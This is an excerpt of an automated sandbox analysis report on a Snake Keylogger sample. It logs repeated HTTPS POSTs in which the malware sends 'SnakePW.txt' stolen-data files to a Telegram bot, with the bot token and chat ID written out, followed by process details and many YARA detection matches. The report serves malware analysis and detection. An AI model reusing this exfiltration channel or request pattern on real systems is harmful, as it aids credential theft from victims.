                            2022-06-26 07:33:19 UTC162OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 63 65 37 31 39 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ece719b2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:20 UTC162INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:19 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:20 UTC163INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66854,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228799,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            97192.168.2.549944149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:20 UTC163OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ed25162a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:20 UTC164OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 64 32 35 31 36 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ed25162aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:20 UTC164INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:20 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:20 UTC165INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66856,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228800,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            98192.168.2.549945149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:20 UTC165OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ed598a5e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:20 UTC165OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 64 35 39 38 61 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ed598a5eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:20 UTC166INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:20 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:20 UTC166INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66857,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228800,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            99192.168.2.549946149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:20 UTC167OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ed97869e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:20 UTC167OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 64 39 37 38 36 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ed97869eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:21 UTC168INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:21 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:21 UTC168INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66858,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228801,"document":{"file_


                            No statistics
                            Target ID:0
                            Start time:09:32:19
                            Start date:26/06/2022
                            Path:C:\Users\user\Desktop\0OZQi3b0tM.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\0OZQi3b0tM.exe"
                            Imagebase:0x530000
                            File size:129537 bytes
                            MD5 hash:A90C091ABDED4A4F763DE7537F569167
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738443207.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737543287.0000000002958000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738278860.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737582921.000000000296C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738464278.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737477229.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737233949.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737426073.000000000292C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737400500.000000000291C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737877910.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737872155.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738102517.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737894796.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737177065.0000000002898000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737163773.0000000002894000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738298999.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737551923.000000000295C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737275091.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737205564.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737680246.0000000002990000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737438859.0000000002934000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737240182.00000000028CB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738349545.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738520206.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737615006.000000000297C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738206086.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737694580.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738046605.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737534636.0000000002954000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738084741.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738331335.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737246038.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737258885.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737950672.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738536747.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737218317.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737983761.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737998771.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737291941.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737504124.0000000002948000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737901412.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737883433.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737944111.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738244012.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737409041.0000000002920000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738141181.0000000002A95000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737889019.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737855627.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737285680.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738079094.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738039601.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738059775.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738194827.0000000002AA5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737190839.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737592635.0000000002970000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738181191.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737144637.000000000288C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737978655.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737655258.0000000002988000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737628909.0000000002980000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737833563.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737414593.0000000002924000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737929824.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737560330.0000000002960000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
